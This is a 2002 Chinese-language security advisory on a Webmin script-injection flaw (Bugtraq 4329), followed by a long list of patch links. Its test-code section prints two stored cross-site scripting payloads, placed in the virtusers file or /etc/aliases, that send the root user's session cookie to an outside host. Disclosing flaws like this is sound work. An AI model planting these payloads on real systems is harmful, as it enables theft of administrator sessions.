Webmin脚本代码输入验证漏洞发布时间:2002-03-23 更新时间:2002-03-23 严重程度:中 威胁程度:权限提升 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:4329 受影响系统 Webmin Webmin 0.1详细描述 Webmin是基于WEB接口的系统管理程序,使用在UNIX和Linux操作系统下。 Webmin没有过滤需要WEB接口显示的输出,如日志文件等,这可导致具有对某些文件有写权利的本地攻击者建立任意脚本代码由ROOT用户来执行。另外,攻击者可以把恶意代码插入到一些输出信息中,也可以对用户进行攻击获得如基于COOKIE认证的相关信息。 测试代码 把如下代码插入到virtusers文件中,等待ROOT用户访问该页: </tt></a></td><tt><td><script>/* */document.write('<img src="http://192.168.40.1/'+document.cookie+'">');</script> 或者把下面的信息插入到/etc/aliases文件中: </a></td><td><tt><script>zz=unescape("%20");document.write('<img'/*: */+zz+'src="http://10.1.1.33/'+document.cookie+'">');</script> 解决方案 下载补丁:Webmin Webmin 0.1: Webmin Upgrade webmin-0.93.tar.gz http://www.webmin.com/download/webmin-0.93.tar.gz Webmin Webmin 0.2: Webmin Upgrade webmin-0.93.tar.gz http://www.webmin.com/download/webmin-0.93.tar.gz Webmin Webmin 0.3: Webmin Upgrade webmin-0.93.tar.gz http://www.webmin.com/download/webmin-0.93.tar.gz Webmin Webmin 0.4: Webmin Upgrade webmin-0.93.tar.gz http://www.webmin.com/download/webmin-0.93.tar.gz Webmin Webmin 0.5: Webmin Upgrade webmin-0.93.tar.gz http://www.webmin.com/download/webmin-0.93.tar.gz Webmin Webmin 0.6: Webmin Upgrade webmin-0.93.tar.gz http://www.webmin.com/download/webmin-0.93.tar.gz Webmin Webmin 0.7: Webmin Upgrade webmin-0.93.tar.gz http://www.webmin.com/download/webmin-0.93.tar.gz Webmin Webmin 0.8.3: Webmin Upgrade webmin-0.93.tar.gz http://www.webmin.com/download/webmin-0.93.tar.gz Webmin Webmin 0.8.4: Webmin Upgrade webmin-0.93.tar.gz http://www.webmin.com/download/webmin-0.93.tar.gz Webmin Webmin 0.21: Webmin Upgrade webmin-0.93.tar.gz http://www.webmin.com/download/webmin-0.93.tar.gz Webmin Webmin 0.22: Webmin Upgrade webmin-0.93.tar.gz http://www.webmin.com/download/webmin-0.93.tar.gz Webmin Webmin 0.31: Webmin Upgrade webmin-0.93.tar.gz http://www.webmin.com/download/webmin-0.93.tar.gz Webmin Webmin 0.41: Webmin Upgrade webmin-0.93.tar.gz http://www.webmin.com/download/webmin-0.93.tar.gz Webmin Webmin 0.42: Webmin Upgrade webmin-0.93.tar.gz http://www.webmin.com/download/webmin-0.93.tar.gz Webmin Webmin 0.51: Webmin Upgrade webmin-0.93.tar.gz http://www.webmin.com/download/webmin-0.93.tar.gz Webmin Webmin 0.76: Webmin Upgrade webmin-0.93.tar.gz http://www.webmin.com/download/webmin-0.93.tar.gz Webmin Webmin 0.77: Webmin Upgrade webmin-0.93.tar.gz http://www.webmin.com/download/webmin-0.93.tar.gz Webmin Webmin 0.78: Webmin Upgrade webmin-0.93.tar.gz http://www.webmin.com/download/webmin-0.93.tar.gz Webmin Webmin 0.79: Webmin Upgrade webmin-0.93.tar.gz http://www.webmin.com/download/webmin-0.93.tar.gz Webmin Webmin 0.80: Webmin Upgrade webmin-0.93.tar.gz http://www.webmin.com/download/webmin-0.93.tar.gz Webmin Webmin 0.85: Webmin Upgrade webmin-0.93.tar.gz http://www.webmin.com/download/webmin-0.93.tar.gz Webmin Webmin 0.88: Webmin Upgrade webmin-0.93.tar.gz http://www.webmin.com/download/webmin-0.93.tar.gz Webmin Webmin 0.91: Webmin Upgrade webmin-0.93.tar.gz http://www.webmin.com/download/webmin-0.93.tar.gz Webmin Webmin 0.92-1: Webmin Upgrade webmin-0.93.tar.gz http://www.webmin.com/download/webmin-0.93.tar.gz Webmin Webmin 0.92: Webmin Upgrade webmin-0.93.tar.gz http://www.webmin.com/download/webmin-0.93.tar.gz 相关信息 <advisory@prophecy.net.nz>. 参考:http://online.securityfocus.com/archive/1/263181 相关主页:http://www.webmin.com/webmin/ |
